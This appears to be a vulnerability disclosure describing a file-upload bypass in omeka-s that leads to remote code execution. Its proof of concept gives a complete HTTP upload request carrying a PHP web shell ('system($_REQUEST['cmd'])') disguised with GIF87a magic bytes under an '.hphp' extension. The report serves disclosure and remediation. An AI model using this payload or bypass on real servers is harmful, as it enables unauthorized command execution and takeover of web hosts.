Unrestricted Upload File leads to Remote Code Execution in omeka/omeka-s
Aug 2nd 2023
The upload file function is vulnerable that user can upload the file with other extensions (.php, .phps, ...) by using Magic Bytes technique. However, the
.htaccess has almost prevented all the files with extensions such as php, phps, phtml, ...
The attacker still can upload the
hphp file and then execute code from a remote machine.
The Apache server which is hosting the web application need to have the ability to execute the
Proof of Concept
Step 1: Login and go to the function that allows uploading, intercept the request, and modify as below
POST /omeka-s/admin/asset/add Host: localhost Content-Length: 344 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/omeka-s/admin/asset Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi Connection: close ------WebKitFormBoundary9KHufs2z61gFOMA6 Content-Disposition: form-data; name="file"; filename="shell_php.hphp" Content-Type: application/octet-stream GIF87a echo system($_REQUEST['cmd']); ------WebKitFormBoundary9KHufs2z61gFOMA6 Content-Disposition: form-data; name="o:alt_text" ------WebKitFormBoundary9KHufs2z61gFOMA6--
With the Magic Bytes
GIF87a, the attacker has bypassed the file check, and then he can upload the file (
.hphp) which is not in the whitelist.
Step 2: Check the file path
Step 3: Access the file path and execute commands
An attacker could use this vulnerability to get code execution on the victim machine